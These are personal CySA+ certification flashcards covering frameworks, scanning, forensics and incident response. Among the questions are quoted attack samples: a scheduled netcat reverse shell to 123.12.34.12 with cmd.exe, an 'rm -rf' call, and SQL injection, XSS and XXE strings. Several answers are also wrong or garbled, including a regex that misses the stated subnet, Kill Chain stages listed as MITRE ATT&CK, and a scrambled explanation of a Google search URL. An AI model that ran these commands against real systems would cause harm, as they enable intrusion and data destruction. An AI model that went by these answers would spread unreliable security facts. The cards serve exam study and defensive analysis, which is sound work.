CySA+ Flashcards

1
Q

Vulnerability scan output: CVE-2011-3389
QID 42366 -SSLv3.0/TLSv1.0 Protocol weak CBC mode Server side vulnerability Check with: OpenSSL s_client-connect login.diontraining.com:443 -tls -cipher “AES:CAMELISA:SEED:3DES:DES”
What category should this be classified as?

A

Web application cryptography vulnerability

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Your an analyst for a bank with offices in multiple states. You want to create an alert to detect if an employee from one bank office logs into a workstation in an office in another state. What type of detection and analysis are you configuring?

A

Behavior based

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security software recommends you should remediate this. What should you do?

A

Change all devices and servers that support it to 636 because encrypted services run by default on 636

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Your org has noticed an increase in the number of security incidents being detected. To better understand the situation and measure the effectiveness of your incident response process, what KPI (key performance indicator) could you use?

A

Alert volume: an increase may correlate with an increase of detected incidents

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What tools can be used to conduct a banner grab from a web server on a remote host?

A

netcat, wget, and telnet
(ftp can’t do it)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

A recent vulnerability scan found several vulnerabilities on an organization’s public facing IP address. To reduce the risk of a breach, which of the following vulnerabilities should be prioritized for remediation?

A

-A cryptographically weak cipher
-An HTTP response that reveals an internal IP address
-A website utilizing a self-signed SSL cert
*A buffer overflow that is know to allow remote code execution

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

An adversary compromised a web server in your network using a zero-day exploit and then uses it as a C2 server for further attacks. Which stage of the MITRE ATT&CK framework does the use of a C2 server illistrate?

A

Command and Control (C2)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Which analysis framework provides a graphical depiction of the attackers approach relative to a kill chain?

A

Diamond Model of Intrusion Analysis

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Which framework provides the most explicit detail regarding how to mitigate or detect a given threat?

A

MITRE ATT&CK

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

According to the Center for Internet Securitiy’s system design recommendation, which control category would contain info on the best security practices to implement within SDLC?

A

Application Software Security

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

A cybersecurity analyst has received an alert that sensors continuously observe a well-know call home messages at their network boundary. Still, the orgs proxy firewall is properly configured to successfully drop the messages before leaving the network. What is the most likely cause of the message being sent?

A

An infected workstation is attempting to reach a C2 server

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

You’re investigating traffic involving 3 separate IP addresses (192.168.66.6, 10.66.6.10, 172.16.66.1). What REGEX expression would you use to be able to capture ONLY these 3 IP addresses?

A

\b(192.168.66.6)|(10.66.6.10)|(172.16.66.1)\b

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

You are conducting a quick nmap scan of a target network. You want to conduct a SYN scan but you don’t have the raw socket privileges on you workstation. What command should you use to conduct the SYN scan from your workstation?

A

nmap -sT

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Nicole’s org doesn’t have the budget for 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. What service provider would be best suited for this?

A

MSSP: Managed Security Service Provider

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

A companies CIO is concerned about the liability of a security vulnerability being exploited in their self-driving car where someone may die. What methodology would provide the single greatest mitigation if successfully implimented?

A

Formal methods of verification

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What provides a standard nomenclature for describing security-related software flaws?

A

CVE

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

You suspect a system’s firmware has been compromised. What type of firmware would provide resistance against suck attack?

A

Trusted Firmware

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

What REGEX expression would provide the appropriate output when searching logs from only the IP subnet 172.161.1.224/26

A

\b172.161.1.(2[0-4][0-9]|25[0-5]|19[2-9])\b

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

What is least likely to be included in a data retention policy?

A

Classification Info

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

As a forensic analyst, what should you collect first?

A

L3 Cach(CPU registry), RAM Cache(System Memory), SSD(Storage Devices), Backup drives

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

Your company is adopting a cloud first architecture model. Management wants to decommission the on-prem SIEM and migrate it to the cloud. What issues could arise?

A

Legal and regulatory issues may prevent data migration to the cloud

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

Diamond Model of Intrusion Analysis

A

Framework for understanding the 4 key elements of cyber attacks. Adversary, victim, infrastructure, capability

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

MITRE ATT&CK

A

Framework detailing tactic, techniques, and procedures.
Reconnaissance · Weaponization · Delivery · Exploitation · Installation · Command & Control (C2) · Actions on Objectives

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

OWASP Testing Guide

A

Methodology for testing web application security

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Cyber Kill Chain
Describes the stages of a cyber attack. Makes no allowances for an adversarial retreat
26
What secure coding practice ensures a character like < is translated into the < string when written to an HTML page?
Output Encoding
27
You are a cyber analyst at a privatly owned bank. Which regulations would have the greatest impact on your bank's cybersecurity program?
GLBA Gramm-Leach-Bliley Act Federal law explaining how to protect customer's private info
28
Root Cause Analysis
Involves investigating an incident to determine its origin and how it unfolded, with an aim of preventing similar incidents
29
Forensic Analysis
Through investigation thats focus in broader and often includes legal implications
30
What can prevent firmware downgrades?
eFuse Intel-designed mechanism to allow software instructions to blow a transistor in the hardware chip
31
You see the following log entry. What is it and how to stop it? sc config schedule start auto net start schedule at 10:42 ""c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe""
The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp folder to create a remote connection to 123.12.34.12 You should recommend removing the host from the network
32
What technique would provide the largest increase in security on a network with ICS, SCADA, and IOT devices?
User and entity behavior analytics
33
tcpdump
Primarily used for capturing and analyzing network packets Faster than Wireshark No GUI
34
What sanitization technique removes data, overwriting a hard drive with randoms 1s and 0s?
Clear
35
Which part in a federation provides services to members of the federation?
RP: Relying Party
36
IdP
Identity Provider Provides identities, makes assertions about those identities and releases info about identity holders
37
SAML
Security Assertion Markup Language Open standard for exchanging authentication & authorization data between parties between an IdP
38
SSO
Single Sign On Authentication scheme that allows users to log in with a single ID and password to related but independent software systems across a federation
39
What technique is most likely to identify a buffer overflow vulnerability in an app during development?
Static code analysis
40
You are searching a Linux server for a possible backdoor during a forensic investigation. Which part of the file system should you search for evidence?
/etc/xinetd.conf newer versions: sytemctl
41
According to MITRE ATT&CK framework what capability can identify and exploit a zero-day vulnerablity?
Developed
42
What type of solution would you classify an FPGA?
Anti-tamper Field-Programmable Gate Array
43
WannaCry's use of Eternal Blue represents which phase of the Cyber Kill Chain?
Weaponization
44
What is the most widely used web-application scanner?
ZAP OWASP Zed Attack Proxy
45
What are 3 Infrastructure vulnerability scanners?
Qualys, OpenVAS, Nessus
46
What type of file is commonly used to store configuration settings for a macOS system?
plists (property lists)
47
During a vulnerability scan you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on that info what do you suspect is true?
You scanned a CDN-hosted version of the site. CDN: Content Delivery Network Geographically distributed network of proxy servers
48
What is the proper order of the UEFI boot phases?
Security Pre-EFI initialization Driver Execution Environment Boot Device Select Transient System Load Runtime
49
What proprietary tool is used to create forensic disk images without making changes to the original evidence?
FTK Imager
50
Memdump
Used to collect content within RAM on a given host
51
Autopsy
Open-source forensic tool suite
52
Which role validates the user's identity when using SAML for authentication?
IdP
53
You need to sanitize hard drives from some leased workstations before returning them to a supplier. The hard drives contained sensitive data. What is the most appropriate proccess to ensure that data exposure doesn't occur during this process?
Purge, validate, and document the sanitation of the drives
54
What technology can be used to ensure that users who log into a network are physically in the same building as the network they are attempting to authenticate on?
GPS location and NAC
55
What describes the infrastructure needed to support the other architectural domains in the TBGAF framework?
Technical architecture
56
Dion Training wants to implement tech within their corporate network to BEST mitigate risk that a zero-day virus might infect their workstations. What should be implemented FIRST?
Application Whitelisting
57
You conduct a vulnerability scan of a data center and notice that a managed interface for a virtualization platform is exposed to your vulnerability scanner. What network should the hypervisor's management interface be exposed to, to ensure the best security of the virtualization platform?
Management Network
58
You have just returned from a business trip from a country with a high intellectual property theft rate. What precautions should you take before reconnecting your laptop to your corporate network?
Scan for malware Physically inspect the laptop and compare it with images made before you left
59
You are trying to find some files deleted by a user on a Windows workstation. What 2 locations are most likely to contain the deleted files?
Recycling Bin Slack Space
60
What does the Infrastructure component of the Diamond Model refer to?
The physical or virtual resources used (phishing)
61
Persistance
MITRE ATT&CK framework Stage that describes how the adversary maintains a foothold in the network
62
Command and Control
MITRE ATT&CK framework Represents the communication channel
63
You want to prevent hosts from connecting to known malware distribution domains. What type of solution should be used without deploying endpoint protection software or an IPS?
DNS Blackholing Uses a list known domains/IPs belonging to malicious hosts and uses an internal DNS server to create a fake reply
64
An org want to choose an authentication protocol that can be used over an insecure network without implementing additional encryption services. What protocol should you use?
Kerberos
65
An analyst suspect that a trojan has victimized a Linux system. Which command should be run to determine where the current bash shell is being executed?
which bash
66
SCAP
Security Content Automation Protocol Multi-purpose framework of specifications supporting automated configuration, vulnerability, and patch checking, tech control compliance activities, and security measurement
67
Security Onion
Free open-source Linux distro for intrusion detection, enterprise security monitoring, and log management
68
What utilizes a well-written set of carefully developed and tested scripts to orchestrate runbooks and generate consistent server builds across an enterprise?
Infrastructure as Code (IaC)
69
A forensic analyst needs to access a macOS encrypted drive that uses File Vault2. What are 3 means of unlocking the volume?
Extract the keys from iCloud Retrieve the key from memory while the volume is mounted Obtain the recovery key
70
You're a security Admin and need to respond to an ongoing spearphishing campaign against your org. What should be used as a checklist of actions to perform to detect and respond to this particular incident?
Playbook Runbook is an automated response
71
Input validation can prevent what vulnerabilities?
SQL Injection Cross-Site Scripting XML Injection Directory Traversal
72
What is the lowest layer of bare-metal virtualization environment?
The physical hardware
73
What type of vulnerability scan would provide the best results if you want to determine if the target's configuration settings are correct?
Credentialed Scan
74
Non-Credentialed Scan
Vulnerability scan that relies on external resources for configuration settings, which can be incorrect or altered
75
If you want to conduct an operating system identification during an nmap scan, what syntax should you use?
nmap -O
76
You need to verify the installation of a critical Windows patch on your org's workstations. What method would be the most efficient to validate the current patch status for all Windows 10 workstations?
Use SCCM to validate patch status Microsoft's System Center Configuration Manager
77
You review Python script used in your org's automation process. You notice the following line of code: os.system('rm -rfl'). What potential security concern does the code represent?
Command Injection
78
Which operating system feature is designed to detect malware that is loaded early in the system startup process or before the OS can load itself?
Measured Boot
79
If you post too much on social media like name, DOB, hometown,... it is easier for an attacker to conduct what type of attack?
Cognitive Password Attack
80
What authentication protocol was developed by Cisco to provide authentication, authorization, and accounting services?
TACACS+ Terminal Access Controller Access-Control System
81
What type of encryption would ensure the best security of a website?
TLS
82
You review the logs of a proxy server and saw the following URL: http://test.diontraining.com/index/php?id=1%20OR%2017-7%3d10 What type of attack has likely occured?
SQL Injection
83
A pentester is conducting an assessment of a wireless network that is secure using WPA2 Enterprise encryption. What are the 2 major differences between conducting reconnaissance of a wireless network vs wired?
Physical accessibility and Encryption
84
Management is concerned about rogue devices being attached to the network. What solutions would quickly provide the most accurate info that could be used to identify rogue devices on the network?
Router and Switch-based MAC address reporting
85
What automatically combines multiple disparate sources of info to form a complete picture of events for analysts to use during an incident response or when conducting proactive threat hunting?
Data Enrichment
86
You're about to conduct forensics on a virtual machine. What process should be used to ensure that all of the data is acquired forensically?
Suspend the machine and copy the contents of the directory it resides in
87
What will an adversary do during the exploitation phase of the Lockheed Martin kill chain?
Take advantage of a software, hardware, or human vulnerability Wait for a user to click on a malicious link Wait for a malicious email attachment to be opened
88
When trying to thoroughly examine the security posture of a major e-commerce platform, which framework serves as an exhaustive guide dedicated explicitly to this purpose?
OWASP Testing Guide
89
Where should a forensic analyst search to find a list of the wireless networks that a laptop has previously connected to with a company-owned laptop?
Search the registry
90
What remediation strategies are the MOST effective in reducing the risk to an embedded ICS from a network-based compromise?
Segmentation Disable unused services
91
What are 3 concerns when migrating to a serverless architecture?
Protection of endpoint security Dependency on the cloud service provider Limited disaster recovery options
92
A cyber analyst is reviewing the logs of a proxy server and saw the following URL: https://www.google.com/search?q=password+filetype%3xls+site%3Adiontraining.com&pws=0&filter=p. What is true about the results of this search?
Personalization is turned off (site%3Adiontraining.com) and (&) disables personalization Returns only files hosted at diontraining.com (filetype%3xls, %3A is the hex-code for ':') and (+) limits results Returns only Microsoft Excel Spreadsheets (q=password) and (+) have filetype equal to xsl
93
Which types of digital forensic investigations is most challenging due to the on-demand nature of the analyzed assests?
Cloud services
94
Your company has announced a change to an "API first" model of software development. As a cyber analyst you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. What is the primary basis for an attack against this vulnerability?
Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution
95
What does a User Agent request a resource from when conducting a SAML transaction?
SP (Service Provider)
96
You company has just enabled key-based authentication on its SSH server. What action should be performed to secure the SSH server?
Disable password authentication for SSH
97
You are creating a script to filter some logs so that you can detect any suspected malware beaconing. What are some typical means of identifying a malware beacons behavior on the network?
The beaconing interval The beacon's persistence The removal of known traffic
98
Policy
Contains procedures and guidelines covering appropriate priorities, actions, and responsibilities in the event of a security incident
99
Procedure
Provide detailed, tactical info for the CSIRT to respond to an incident
100
What method should a cyber analyst use to locate any instances on the network where passwords are being sent in cleartext?
Full packet capture
101
You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Your network has several different OSs in use but you only have 1 machine available to test the patches. What is the best environment to use to perform the testing of the patches before deployment?
Virtualization
102
In the Colonial Pipeline ransomeware attack, the DarkSide ransomware group fulfilled their intent by encrypting files and demanding a ransom. Which phase of the Cyber Kill Chain does this represent?
Actions on Objectives
103
Lockheed Martin Kill Chain Stages
Reconnaissance Weaponization Delivery Exploitation Installation Command & Control (C2) Actions on Objectives
104
In the Cyber Kill Chain, at which stage does an attacker deliver the actual working part of the attack?
Exploitation Exploitation-attacker leverages vulnerability to execute main part of attack Weaponization-attacker creates malicious payload, does not deliver it
105
Riaan's company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which compensating control should be recommended until the system can be remediated? A. Vulnerability scanning B. Encryption C. WAF D. IPS
C. WAF
106
A cybersecurity analyst reviews the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com Which is true about the results of the search? A. Returns all web pages containing an email address affiliated with diontraining.com B. Returns all web pages containing the text diontraining.com C. Returns all web pages hosted at diontraining.com D. Returns no useful results
A. Returns all web pages containing an email address affiliated with diontraining.com %40 is the hex code for @
107
The 2018 Drupalgeddon2 incident saw hackers actively exploiting a highly critical vulnerability (CVE-2018-7600) in Drupal content management system. Which versions of Drupal's security patch would have remediated this? A. Durpal 7.56/8.3.4 B. Durpal 7.54/8.2.7 C. Durpal 7.57/8.4.5 D. Durpal 7.58/8.5.1
D. Durpal 7.58/8.5.1
108
Which of the following functions is not provided by TPM? A. User authentication B. Random number generation C. Sealing D. Remote attestation E. Binding F. Secure Generation of cryptographic keys
A. User authentication
109
Which of the following is NOT a host-related indicator of compromise? A. Memory Consumption B. Beaconing C. Processor Consumption D. Drive Capacity Consumption
B. Beaconing Beaconing is considered a network-related IoC
110
A cybersecurity analyst notices the following XML transaction while reviewing the communication logs for a public-facing application that receives XLM input directly from its clients: ]>&abc; Based on the output, which is true? A. The application is using parameterized queries to prevent XML injections B. An XML External Entity (XXE) vulnerability has been exploited and its possible that that password has downloaded the file "ect/passwd". C. ISO-8859-1 only covers the Latin alphabet and may preclude other languages from being used D. There is no concern since "/etc/passwd" does not contain any system passwords
B. . An XML External Entity (XXE) vulnerability has been exploited and its possible that that password has downloaded the file "ect/passwd".
111
Which of the following are the two most important factors when determining a containment strategy? A. Preservation of evidence B. Identification of whether the intrusion is the primary attack or a secondary one C. Prevention of an ongoing intrusion or data breach D. Avoidance of alerting the attacker that they have been discovered E. Ensuring the safety and security of all personnel
C & E
112
You're a cybersecurity analyst who has been given the output from a system administrator's Linux terminal. Based on the output, which of the following is true? BEGIN OUTPU ------------ #nmap win 2k16.local Nmap scan report for win2k (192.168.2.15) Host is up (0.132452s latency) Not shown: 997 closed ports Port. State. Service 22/tpc. open. ssh 80/tpc. open http #nc win2k16.local 80 220 win2k16.local DionTraining SMTP Server (Postfix/2.4.1) #nc win2k16.local 22 SSH-2.0-OpenSSH_7.2 Debian-2 #_-------------------- END OUTPUT A. Your org has a vulnerable version of the SSH server software installed B. Your email server has been compromised C. Your email server is running on a non-standard port D. Your web server has been compromised
C. Your email server is running on a non-standard port. Output shows SMTP is running on port 80 and the standard port is 25.
113
A new security appliance was installed on a network as part of a managed service deployment. The vendor controls the appliance and the IT team cannot log in or configure it. The IT team is concerned about the appliance receiving the necessary updates. Which of the following should be performed to minimize the concern? A. Scan and patch the device B. Automatic Updates C. Configuration management D. Vulnerability scanning
D. Vulnerability scanning
114
Dion Training is concerned with the possibility of employees accessing another user's workstation in secured areas without their permission. Which would BEST prevent this from happening? A. Install security cameras in secure areas to monitor logins B. Require biometric identification for user logins C. Require username and password for user logins D. Enforce a policy that requires passwords to be changed every 30 days
B. Require biometric identification for user logins
115
You company has just finished replacing all of its computers with brand new workstations. A coworker asks the company if she can have the old computers that are about to be thrown away so she can refurbish them be reinstalling a new OS and donate them. The owner thinks it's a great idea but is concerned about the sensitive info on the drives. What is the best solution to sanitize or destroy the data while ensuring the computers will still be usable? A. Purging B. Shredding C. Degaussing D. Wiping
D. Wiping Can't reuse hare drive once it has been degaussed. Generally can't reuse after purging.
116
Which term is used in software development to refer to the method in which app and platform updates are committed to a production environment rapidly? A. Continuous integration B. Continuous monitoring C. Continuous deployment D. Continuous delivery
C. Continuous deployment
117
A major cyber incident has occurred at your org. As part of the incident response team you have been tasked with analyzing the incident, including who caused it, what systems were affected, when it occurred, where it originated from, and why it happened. What kind of report are you preparing? A. Incident declaration report B. Incident response report C. Regulatory reporting D. Root cause analysis report
B. Incident response report
118
The security team from Kelly Nexis Analytics has detected the Apache Log4j vulnerability in JIRA. What is a practical method for the team to eliminate this vulnerability? A. Patching B. Antivirus Software C. Virtual Private Network D. Firewall Implimentation
A. Patching
119
Which of the following vulnerability scanning tools would be used to conduct a web application vulnerability assessment? A. OpenVAS B. Nessus C. Nikto D. Qualys
C. Nikto
120
Which of the following has occurred if a device fails to activate because it has detected an unknown modification? A. Improper authentication B. Obfuscation C. Self-checking D. Failed trust foundry
C. Self-checking
121
Which of the following is a technique used in Secure Disposal? A. Zero-fill B. Degaussing C. Erasing D. Clearing
B. Degaussing Clearing does not destroy
122
An SNMP sweep is being conducted but the sweep received no-response replies from multiple addresses that are believed to belong to active hosts. What does this indicate to a cybersecurity analyst? A. The community string being used is invalid B. Any listed answers may be true C. The machines are not running SNMP servers D. The machines are unreachable
B. Any listed answers may be true
123
Dion consulting group has been hired to analyze the cybersecurity model for a new videogame console system. The manufacturer's team has come up with four recommendations to prevent intellectual property theft and piracy. As the cybersecurity consultant on this project, which of the following would you recommend implementing first? A. Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchases which game B. Ensure that all screen capture content is visibly watermarked C. Ensure that all games for the console are distributed as encrypted so that they can only be decrypted on the game console D. Ensure that all games require excessive storage sizes so that it is difficult for unauthorized parties to distribute
A. Ensure that each individual console has its own unique key for decrypting individual licenses and tracking which console has purchases which game
124
Which of the following protocols is commonly used to collect information about CPU utilization and memory usage from network devices? A. NetFlow B. SNMP C. MIB D. SMTP
B. SNMP (Simple Network Management Protocol)
125
Which protocol is paired with OAuth2 to provide authentication of users in a federated identity management solution? A. Kerberos B. ADFS C. OpenID Connect D. SAML
C. OpenID Connect
126
What type of information will a Cisco switch log be configured to capture logs at level 7? A. Emergencies B. Warnings C. Debugging D. Errors
C. Debugging 0-Emergencies
127
A vulnerability scan has returned the following: Detailed Results 10.56.17.21 (APACHE-2.4) Windows Shares Category: Windows CVE ID: - Vendor Ref: - Bugtraq ID: - Service Modified - 8.30.2017 Enumeration Results: print$c:\windows\system32\spool\drivers files c:\FileShare\Accounting Temp c:\temp What best describes the output? A. There is no CVE present, so this is a false positive caused by Apache running on a Windows server B. There is an unknown bug in an Apache server with no Bugtraq ID C. windows Defender has a known exploit that must be resolved or patched D. Connecting to the host using a null session allows enumeration of the share names on the host
D. Connecting to the host using a null session allows enumeration of the share names on the host
127
Your org is transitioning to a cloud environment and wants to ensure its new infrastructure is secure. Ehat tool could you utilize to assess the security of your cloud infrastructure? A. Pacu B. Nmap C. Nessus D. Burp Suite
A. Pacu This is designed for AWS environments. Nessus is not specifically designed for cloud infrastructure assessments
128
You are conducting an incident response and want to determine if any account-based IoCs exist in a compromised server. Which of the following would you NOT search for on the server? A. Unauthorized sessions B. Malicious processes C. Off-hours usage D. Failed logins
B. Malicious processes Malicious process is host-based IoC and not directly associated with an account-based IoC
129
Which of the following actions should you perform during the post-incident activities of an incident response? A. Create an incident summary reporting with in-depth technical recommendations for future resourcing and budgeting B. Perform evidence retention in accordance with the timescale defined by the regulatory or legal impact of the incident C. Ensure confidentiality of the lessons learned report by not sharing it beyond the incident response team who handled the investigation D. Sanitize storage devices that contain an dd images collected to prevent liability arising from evidence collection
B. Perform evidence retention in accordance with the timescale defined by the regulatory or legal impact of the incident
130
A cybersecurity analyst has deployed a custom DLP signature to alert on any files that contain numbers in format of a social security number. Which of the following concepts within DLP is being utilized? A. Classification B. Statistical matching C. Document matching D. Exact data match
D. Exact data match
131
What port does LDAP run on?
389
131
You org has just migrated to provisioning its corporate desktops as virtual machines and accessing them using thin clients. The org believes this will enhance security since the desktop can be rewritten with a new baseline image every time the user logs into it. Based on this scenario, which technology has the organization adopted? A. VPC B. UEBA C. VPN D. VDI
D. VDI VDI = Virtual Desktop Infrastructure VPC = Virtual Private Cloud UEBA = User and Entity Behavior Analytics
132
Which of the following is not normally part of an endpoint security suite? A. IPS B. Software firewall C. VPN D. Anti-virus
C. VPN
133
Natalie wants to create a backup of the permissions before making changes to the Linux workstation she will remediate. What Linux tool can she use to back up the permissions of the system's complete directory structure? A. iptables B. chbkup C. getfacl D. aclman
C. getfacl aclman and chbkup are not legit commands iptables is to configure the firewall
134
During a simulated attack on your org's network, the red team identified several vulnerabilities and successfully exfiltrated data. The red team then used these vulnerabilities and the steps they took to create an example of a possible real-world attack. Which framework does this attack sequence BEST represent? A. MITRE ATT&CK B. OWASP Testing Guide C. Cyber Kill Chain D. Diamond Model of Intrusion Analysis
C. Cyber Kill Chain
135
Matt is creating a scoping worksheet for an upcoming penetration test for his organization. Which of the following techniques is NOT usually included in a pen test? A. Denial-of-service Attack B. Physical Penetration Attempts C. Reverse Engineering D. Social Engineering
A. Denial-of-service Attack
136
You have been given access to a Windows system located on an Active Directory domain as part of a white box pen test. Which of the following commands would provide information about the other systems on this network? A. net group B. net use C. net config D. net user
B. net use net group is only used on DCs net user would show accounts net config allow server and workstations services to be controlled once identified
137
During a port scan you discovered a service running on a registered port. Base on this, what do you know about this service? A. The service is running on a port between 0-1023 B. The service's name on the registered port C. The service is running on a port between 1024 - 49151 D. The vulnerability status os the service on the registered port
C. The service is running on a port between 1024-49151
138
Which of the following categories of controls are firewalls, IDS, and a RADIUS server classified as? A. Administrative Controls B. Technical Controls C. Physical Controls D. Compensating Controls
B. Technical Controls
139
You just finished conducting a remote scan of a class C network block using the following command 'nmap -sS 202.15.73.0/24'. The results only showed a single web server. Which of the following techniques would allow you to gather additional info about the network? A. Use and IPS evasion technique B. Scan using the -p 1-65535 flag C. Usa a UDP scan D. Perform a scan from on-site
D. Perform a scan from on-site
140
Which tool should a malware analyst utilize to track the registry's changes and the file system while running a suspicious executable on a Windows system? A. ProcDump B. Autoruns C. Process Monitor D. DiskMon
C. Process Monitor Autoruns show what programs are configured to run during bootup or login
141
What is a reverse proxy commonly used for? A. Directing traffic to internal services if the contents of the traffic comply with the policy B. Allowing access ti a virtual private cloud C. To prevent unauthorized use of cloud services from the local network D. To obfuscate the origin of a user within a network
A. Directing traffic to internal services if the contents of the traffic comply with the policy
142
During which incident response phase is the preservation of evidence performed? A. Detection and analysis B. Containment, eradication, and recovery C. Preparation D. Post-incident activity
B. Containment, eradication, and recovery
143
During a recent security incident, you, as an incident responder, documented each action and decision that took place, from the initial detection to final remediation. This detailed timeline could prove particularly useful for which part of the incident response reporting? A. Impact B. Executive summary C. Lessons learned D. Scope
C. Lessons learned
144
You're analyzing the logs of a web server and see the following: 192.168.1.25 - - [05/Aug/2020:15:16:42 -0400] "Get /%27%27;!-%22%3CDION%3E=&{()} HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; en-US; rv:1.9.0.12)Gecko/2009070812 Ubuntu/19.04 (disco dingo) Firefox/3.0.12" Based on this, which following attack was attempted? A. XML injection B. Buffer overflow C. SQL injection D. XSS
D. XSS The attack was obfuscated by the attacker using HTML encoding. The encoding of %27%27 translates to two single quote marks (' ').
145
You are analyzing DNS logs looking for indicators of compromise associated with the use of a fast-flux network. You are already aware that the names involved in this particular fast-flux network are longer than 50 characters and always end in a .org top-level domain. Which of the following REGEX expressions would you use to filter DNS traffic that matches this? A. \b[A-Za-z0-9\.\-]{50,251}+\.org B. \b[A-Za-z0-9.-]{50,251}+.org C. \b[A-Za-z0-9\.-]{50,251}+.org D. \b(A-Za-z0-9\.\-){50,251}|\.org
A. \b[A-Za-z0-9\.\-]{50,251}+\.org + means it matches between 50 and 251 instances of any of the preceding letters (A-Z, a-z, 0-9, period, and the minus symbol)
146
During the Sony Pictures hack in 2014, the attackers installed a wiper malware names Destover on Sony's systems to erase data. Which phase of the Cyber Kill Chain does this represent? A. Delivery B. Installation C. Reconnaissance D. Actions and Objectives
B. Installation
147
A penetration tester is using a known vulnerability to compromise an Apache webserver. After they gain access to the server, what is their next step to pivot to a protected system behind the DMZ? A. Vulnerability scanning B. Patching C. Privilege escalation D. Installing additional tools
C. Privilege escalation
148
A cybersecurity analyst is reviewing the DNS logs for his company's networks and sees the following: $ cat dns.log | bro-cut querygu2m9qhychvxrvh0eift.comoxboxkgtyx9veimcuyri.com4f3mvgt0ah6mz92frsmo.comasvi6d6ogplqyfhrn0p7.com5qlark642x5jbissjm86.com Based on this potential IoC, which of the following hypotheses should you make to begin threat hunting? A. The DNS server is running out of memory due to a memory resource exhaustion attack B. Data exfiltration is being attempted by an APT C. Fast flux DNS is being used for an attacker's C2 D. The DNS server's hard drive is being used as a staging location for a data exfiltration
C. Fast flux DNS is being used for an attacker's C2
149
After a successful spear-phishing attack, an adversary has gained access to your organization's network. The adversary then performs a Pass-the-Hash attack to gain administrative privileges, moved horizontally in the network, and finally exfiltrates sensitive data. What stage of the MITRE ATT&CK framework does this movement represent? A. Lateral Movement B. Exfiltration C. Initial Access D. Credential Access
A. Lateral Movement
150
You suspect that a service called explorer.exe on a Windows server is malicious, and you need to terminate it. Which of the following tools would NOT be able to terminate it? A. sc B. wmic C. services.msc D. secpol.msc
D. secpol.msc secpol.msc = security policy auditor
151
In the preparation phase of the incident management life cycle, which aspect involved assembling and maintaining a collection of scripts, applications, and other software that can be used to respond to a cyber threat effectively? A. Incident response plan B. Business continuity disaster recovery C. Tools D. Playbooks
C. Tools
152
Evaluate the following log entry: Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0 Based on this, which statements are true? A.MAC filtering is enabled on the firewall B. Packets are being blocked inbound to and outbound from the network C. The packet was blocked outbound from the network D. An attempted connection to the ssh service was prevented E. The packet was blocking inbound to the network F. An attempted connection to the telnet service was prevented
E. The packet was blocking inbound to the network F. An attempted connection to the telnet service was prevented
153
When assessing risks to your organization's IT infrastructure, which framework allows for prioritization based on the potential impact of threats? A. ISO 31000 B. OWASP Top 10 C. NIST's Cybersecurity Framework D. Center for Internet Security (CIS) Top 20 Critical Security Controls
C. NIST's Cybersecurity Framework
154
A cybersecurity analyst is working at a college that wants to increase its network's security by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. Any proposed solution must scale up and down as new students and faculty use the network. Additionally, the analyst wants to minimize the number of false positives to ensure accuracy in their results. The chosen solution must also be centrally-managed through an enterprise console. Which of the following scanning topologies would be BEST able to meet these requirements? A. Combination of server-based and agent-based scanning engines B. Passive scanning engine located at the core of the network infrastructure C. Combination of cloud-based and server-based scanning engines D. Active scanning engine installed on the enterprise console
D. Active scanning engine installed on the enterprise console
154
You have been hired to investigate a possible insider threat from a user names Terri. Which of the following commands would successfully look through all the log files in '/var/log' for any references to "Terri" or "terri" on a Linux server? A. find /var/log/ -exec grep -H -e "'terri' OR 'Terri'" {}\;2> /dev/null B. find /var/log/ -name *.log -exec grep -H -e "'Terri' OR 'terri'" {} \;2>/dev/null C. find /var/log/ -exec grep -H -e "[Tt]erri" {} \;2> /dev/null D. find /var/log/ -name "*.log" -exec grep -H -e "[Tt]erri" {} \;2>/dev/null
C. find /var/log/ -exec grep -H -e "[Tt]erri" {} \;2> /dev/null
154
